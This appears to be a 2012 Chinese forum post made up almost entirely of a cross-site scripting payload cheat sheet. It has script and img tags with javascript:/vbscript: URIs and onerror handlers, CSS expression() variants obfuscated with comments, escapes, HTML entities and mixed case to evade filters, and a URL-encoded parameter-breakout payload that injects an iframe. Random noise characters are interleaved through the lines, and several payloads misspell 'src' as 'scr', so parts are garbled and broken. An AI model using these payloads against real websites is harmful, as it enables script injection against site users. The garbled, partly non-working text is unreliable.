<script>alert("跨站")</script> (最常用)) Y6 ]$ n/ w# V
<img scr=javascript:alert("跨站")></img># H; V3 p3 y* @5 z/ K
<img scr="javascript: alert(/跨站/)></img>1 z+ D! i' U5 X2 d- J2 h
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)5 U' J5 y$ G G! j' K0 }
<img scr="#" onerror=alert(/跨站/)></img>% @. }& h( U7 O9 U
<img scr="#" style="xss:expression(alert(/xss/));"></img>
; M5 J5 P" L, {( Y<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
; s( [2 G0 H1 {6 A; x<img src=vbscript:msgbox ("xss")></img>
! B8 e9 e, z6 K: ~9 K/ H4 o2 N5 c<style> input {left:expression (alert('xss'))}</style>
0 J& o9 ]% L2 c" D, \+ P<div style={left:expression (alert('xss'))}></div>
! C9 a* v& T5 Q; Y<div style={left:exp/* */ression (alert('xss'))}></div>5 |" V1 V2 l$ r' g) @* [3 k- E6 W
<div style={left:\0065\0078ression (alert('xss'))}></div>8 d3 l, z. c D$ l% E7 }' v
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
* x" c' n; O( K) _6 ^% n8 x( Aunicode <div style="{left:expRessioN (alert('xss'))}"># Q& p, k. R5 D' w# Z) _+ N
& H. g1 H3 v' m# f1 P"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
" @. Y8 h" @1 r2 l; Z% v |
发表于 2012-9-15 14:09:13
收藏
支持
反对